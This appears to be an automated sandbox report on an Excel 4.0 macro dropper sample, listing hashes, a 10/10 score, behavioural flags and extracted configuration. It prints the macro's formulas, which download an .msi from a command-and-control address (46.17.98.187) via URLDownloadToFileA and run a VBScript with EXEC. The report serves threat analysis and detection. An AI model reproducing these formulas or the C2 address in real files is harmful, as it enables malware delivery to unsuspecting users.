General

  • Target

    284f5287a79857e0b914ea629491a8ed

  • Size

    6KB

  • Sample

    231221-3ms75sbddr

  • MD5

    284f5287a79857e0b914ea629491a8ed

  • SHA1

    07345a717af8a7b1d74a43e61515bf5a67f969ec

  • SHA256

    d7718ab50d124c780a5f0c2b6f6449cc73e4b2e778f785e4b93a468abe7e7313

  • SHA512

    269dab2fdeaad46db0cb92f5da9e7a15ffcd9dd7edcd6b386490c74506101f802f8e1f7d9cd4fcf1f321648800cebf55541109bd394db7dab76bc07a28c57bf2

  • SSDEEP

    192:NDSRuS3brA2OmmfRq8UhHFBFYu0b98yDP+I+9:Nyu0M2w81FYtb98yDP+P

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      284f5287a79857e0b914ea629491a8ed

    • Size

      6KB

    • MD5

      284f5287a79857e0b914ea629491a8ed

    • SHA1

      07345a717af8a7b1d74a43e61515bf5a67f969ec

    • SHA256

      d7718ab50d124c780a5f0c2b6f6449cc73e4b2e778f785e4b93a468abe7e7313

    • SHA512

      269dab2fdeaad46db0cb92f5da9e7a15ffcd9dd7edcd6b386490c74506101f802f8e1f7d9cd4fcf1f321648800cebf55541109bd394db7dab76bc07a28c57bf2

    • SSDEEP

      192:NDSRuS3brA2OmmfRq8UhHFBFYu0b98yDP+I+9:Nyu0M2w81FYtb98yDP+P

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks